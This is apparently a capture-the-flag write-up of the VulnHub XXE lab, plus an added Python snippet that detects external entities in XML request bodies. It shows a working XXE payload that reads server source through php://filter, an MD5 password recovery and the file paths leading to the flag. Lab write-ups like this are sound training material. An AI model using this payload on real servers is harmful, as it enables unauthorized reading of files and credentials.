Lab page: https://www.vulnhub.com/?q=xxe
Lab environment download: https://download.vulnhub.com/xxe/XXE.zip
1. Use nmap to find the target machine's IP and other information
After downloading, extracting and installing the lab environment, the target's username and password are unknown. Since it sits on the same subnet as the Kali host, nmap can be used to discover the target's IP and other details; the results are as follows:
2. Extract the key information and exploit it
Browse directly to the xxe directory (it has a login form)
Enter an arbitrary username and password and capture the request with Burp
The request body is in XML format, so that is what we attack next
Read the contents of xxe.php
payload:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<root><name>&sp;</name><password>hj</password></root>
Base64-decode the highlighted content (drop the trailing "not not available!"); the result is as follows:
Nothing important there, so change xxe.php to admin.php and read admin.php instead:
Base64-decode it, which gives the following:
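As an added defender-side example (not part of the original writeup), the Python snippet below shows how a server or WAF can flag request bodies like the payload above: it extracts external entity declarations from the DOCTYPE, classifies the referenced URI scheme, and returns a block decision. The sample body is constructed from the payload shown above.

```python
import re

# Constructed sample: the captured login request body with an external
# entity that reads xxe.php through the php://filter stream wrapper.
SAMPLE_BODY = """<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<root><name>&sp;</name><password>hj</password></root>"""

# Matches <!ENTITY name SYSTEM "uri"> and <!ENTITY name PUBLIC "id" "uri">,
# including parameter entities (<!ENTITY % name ...>) and either quote style.
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?(?P<name>[\w.-]+)\s+'
    r'(?:SYSTEM\s+(?P<sys>"[^"]*"|\'[^\']*\')'
    r'|PUBLIC\s+(?:"[^"]*"|\'[^\']*\')\s+(?P<pub>"[^"]*"|\'[^\']*\'))',
    re.IGNORECASE,
)


def external_entities(xml_text):
    """Return [(entity_name, uri)] for every external entity declared in the DOCTYPE."""
    found = []
    for m in ENTITY_RE.finditer(xml_text):
        uri = (m.group("sys") or m.group("pub")).strip("\"'")
        found.append((m.group("name"), uri))
    return found


def uri_risk(uri):
    """Classify what an external entity would reach: PHP stream wrappers and
    file:// mean a local file read, network schemes mean out-of-band access."""
    scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
    if scheme in ("php", "file", "expect", "phar", "zip", "glob", "data"):
        return "local-read"
    if scheme in ("http", "https", "ftp", "gopher"):
        return "out-of-band"
    return "unknown"


def should_block(xml_text):
    """Policy assumed here: a login endpoint never needs a DOCTYPE, so any body
    that declares one, or any external entity, is rejected before parsing."""
    return "<!DOCTYPE" in xml_text.upper() or bool(external_entities(xml_text))
```

Running `should_block` before the XML ever reaches the parser is the cheap check; disabling external entity loading in the parser itself is the real fix.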
<?php
session_start();
?>
<html lang = "en">
<head>
<title>admin</title>
<link href = "css/bootstrap.min.css" rel = "stylesheet">
<style>
body {
padding-top: 40px;
padding-bottom: 40px;
background-color: #ADABAB;
}
.form-signin {
max-width: 330px;
padding: 15px;
margin: 0 auto;
color: #017572;
}
.form-signin .form-signin-heading,
.form-signin .checkbox {
margin-bottom: 10px;
}
.form-signin .checkbox {
font-weight: normal;
}
.form-signin .form-control {
position: relative;
height: auto;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
padding: 10px;
font-size: 16px;
}
.form-signin .form-control:focus {
z-index: 2;
}
.form-signin input[type="email"] {
margin-bottom: -1px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
border-color:#017572;
}
.form-signin input[type="password"] {
margin-bottom: 10px;
border-top-left-radius: 0;
border-top-right-radius: 0;
border-color:#017572;
}
h2{
text-align: center;
color: #017572;
}
</style>
</head>
<body>
<h2>Enter Username and Password</h2>
<div class = "container form-signin">
<?php
$msg = '';
if (isset($_POST['login']) && !empty($_POST['username'])
&& !empty($_POST['password'])) {
if ($_POST['username'] == 'administhebest' &&
md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
$_SESSION['valid'] = true;
$_SESSION['timeout'] = time();
$_SESSION['username'] = 'administhebest';
echo "You have entered valid use name and password <br />";
$flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
echo $flag;
}else {
$msg = 'Maybe Later';
}
}
?>
</div> <!-- W00t/W00t -->
<div class = "container">
<form class = "form-signin" role = "form"
action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']);
?>" method = "post">
<h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
<input type = "text" class = "form-control"
name = "username"
required autofocus></br>
<input type = "password" class = "form-control"
name = "password" required>
<button class = "btn btn-lg btn-primary btn-block" type = "submit"
name = "login">Login</button>
</form>
Click here to clean <a href = "adminlog.php" tite = "Logout">Session.
</div>
</body>
</html>
From this the username and password check can be identified:
if ($_POST['username'] == 'administhebest' &&
md5($_POST['password']) ==
'e6e061838856bf47e1de730719fb2609') {
The password is stored as an MD5 hash; try an online lookup site (which in practice just runs a wordlist) to see whether it can be recovered:
It cracks successfully; the password is: admin@123
Go to http://192.168.10.6/xxe/admin.php (the reason for logging in here is that the file the credentials were read from has the absolute path /xxe/admin.php)
and log in,
then click "Flag" to get the following:
Next read flagmeout.php (it is under the root directory, so note the ./ prefix)
After base64 decoding, the result is:
<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>
JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5
This string is base32 encoded; decode it on an online site:
The decoded result is base64 encoded: L2V0Yy8uZmxhZy5waHA=, so decode it again with Burp:
That gives /etc/.flag.php; read it with Burp again:
Then base64-decode once more:
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Ã=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Ã[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Ã.$Â.$Ã.$___.$Ã.$À.$Ã.$___.$Ã.$À.$È.$___.$Ã.$À.$Ã.$___.$Ã.$Â.$Ã.$___.$Ã.$Â.$À.$___.$Ã.$É.$Ã.$___.$Ã.$É.$À.$___.$Ã.$É.$À.$___.$Ã.$Ä.$Æ.$___.$Ã.$Ã.$É.$___.$Ã.$Æ.$Ã.$___.$Ã.$È.$Ã.$___.$Ã.$Ã.$É.$___.$Ã.$È.$Ã.$___.$Ã.$Æ.$É.$___.$Ã.$Ã.$É.$___.$Ã.$Ä.$Æ.$___.$Ã.$Ä.$Ã.$___.$Ã.$È.$Ã.$___.$Ã.$É.$Ã.$___.$Ã.$É.$Æ.'"');$__($_);
The decoded content is unreadable at first, but since it is a .php file it is presumably PHP code, so run it on an online PHP sandbox:
The result of execution is (xxe_is_so_easy):
And with that the challenge is solved!! Confetti!!!
Overall process:
Scan IP and ports -> scan for directories -> capture the request and probe for XXE -> use XXE to read source code ->
flag points to a file -> base32/base64 decode -> run the PHP -> flag
Honestly, it is a fairly convoluted path.